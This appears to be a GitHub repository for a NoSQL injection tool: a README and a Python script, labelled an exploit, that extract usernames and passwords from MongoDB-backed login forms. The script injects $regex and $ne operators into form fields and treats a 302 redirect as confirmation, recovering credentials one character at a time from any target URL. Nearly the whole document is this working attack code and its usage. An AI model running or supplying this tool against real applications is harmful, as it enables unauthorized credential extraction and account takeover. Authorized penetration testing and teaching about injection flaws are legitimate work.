Repository: an0nlk/Nosql-MongoDB-injection-username-password-enumeration
Branch: master
Commit: 1b3713ab2221
Files: 2
Total size: 5.2 KB

Directory structure:
gitextract_240q6mjc/

├── README.md
└── nosqli-user-pass-enum.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# Nosql injection username and password enumeration script
Using this script, we can enumerate Usernames and passwords of Nosql(mongodb) injecion vulnerable web applications.
<br /><br />
Exploit Title: Nosql injection username/password enumeration.<br />
Author: Kalana Sankalpa (Anon LK).<br />
Website: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/<br />

## How to run 

### Usage

```
nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]
```

### Example

```
python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit
```

### Arguments

| Arguments        | Description           |
| ------------- |:-------------:|
| -h, --h      | show this help message and exit |
| -u URL      | Form submission url. Eg: http://example.com/index.php      |
| -up parameter | Parameter name of the username. Eg: username, user      |
| -pp parameter | Parameter name of the password. Eg: password, pass      |
| -op parameters | Other paramters with the values. Separate each parameter with a comma(,). <br />Eg: login:Login, submit:Submit      |
| -ep parameter | Parameter that need to enumarate. Eg: username, password      |
| -m Method | Method of the form. Eg: GET/POST      |

![alt test](screenshots/usage.png)

![alt test](screenshots/run.jpg)

![alt test](screenshots/result.png)


================================================
FILE: nosqli-user-pass-enum.py
================================================
# Exploit Title: Nosql injection username/password enumeration
# Author: Kalana Sankalpa (Anon LK)
# Websites: https://www.widane.com, https://blogofkalana.wordpress.com
# Blogpost: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/

#!/usr/bin/python
import string
import requests
import argparse
import sys
from colorama import Fore

parser = argparse.ArgumentParser()
parser.add_argument("-u", action='store', metavar="URL", help="Form submission url. Eg: http://example.com/index.php")
parser.add_argument("-up", action='store', metavar="parameter", help="Parameter name of the username. Eg: username, user")
parser.add_argument("-pp", action='store', metavar="parameter", help="Parameter name of the password. Eg: password, pass")
parser.add_argument("-op", action='store', metavar="parameters", help="Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit")
parser.add_argument("-ep", action='store', metavar="parameter", help="Parameter that need to enumerate. Eg: username, password")
parser.add_argument("-m", action='store', metavar="Method", help="Method of the form. Eg: GET/POST")
args = parser.parse_args()

if len(sys.argv) == 1:
	print(parser.print_help(sys.stderr))
	print(Fore.YELLOW + "\nExample: python " + sys.argv[0] + " -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST")
	exit(0)
if args.u:
	url = args.u
else:
	print(Fore.RED + "Error: please enter URL with -u. ")
	exit(0)

if args.up:
	userpara = args.up
else:
	print(Fore.RED + "Error: please enter User Parameter with -up.")
	exit(0)

if args.pp:
	passpara = args.pp
else:
	print("Error: Fore.RED + please enter Password Parameter with -pp.")
	exit(0)

if args.ep:
	if args.ep == args.up:
		para1 = userpara
		para2 = passpara
	elif args.ep == args.pp:
		para1 = passpara
		para2 = userpara
	else:
		print(Fore.RED + "Error: please enter the valid parameter that need to enumarate")
		exit(0)
else:
	print(Fore.RED + "Error: please enter the Parameter that need to enumerate with -ep.")
	exit(0)

if args.op:
	otherpara = "," + args.op
else:
	otherpara = ""

if args.m is None:
	print(Fore.RED + "Warning: No method given. Using POST as the method. (You can give the method with -m)")
	
def method(url, para):
	if args.m:
		if args.m[0] == "p" or args.m[0] == "P":
			return requests.post(url, data=para, allow_redirects=False)
		elif args.m[0] == "g" or args.m[0] == "G":
			return requests.get(url, params=para, allow_redirects=False)
		else:
			print(Fore.RED + "Error: Invalid method")
			exit(0)
	else:
		return requests.post(url, data=para, allow_redirects=False)

characters = string.printable
for ch in string.printable:
	
	if ch in "$^&*|.+\?":
		characters = characters.replace(ch, '')
loop = True
finalout = ""
count = 0

for firstChar in characters:
	para = {para1 + '[$regex]' : "^" + firstChar + ".*", para2 + '[$ne]' : '1' + otherpara}
	r = method(url, para)
	if r.status_code != 302:
			print(Fore.MAGENTA + "No pattern starts with '" + firstChar + "'")
			continue;

	loop = True
	print(Fore.GREEN + "Pattern found that starts with '" + firstChar + "'")
	userpass = firstChar
	while loop:
		loop = False

		for char in characters:
			payload = userpass + char
			para = {para1 + '[$regex]' : "^" + payload + ".*", para2 + '[$ne]' : '1' + otherpara}
			r = method(url, para)
	
			if r.status_code == 302:
				print(Fore.YELLOW + "Pattern found: " + payload)
				userpass = payload
				loop = True

	print(Fore.GREEN + para1 + " found: "  + userpass)
	finalout +=  userpass + "\n"
	count += 1;

if finalout != "":
	print("\n" + str(count) + " " + para1 + "(s) found:")
	print(Fore.RED + finalout)
else:
	print(Fore.RED + "No " + para1 + " found")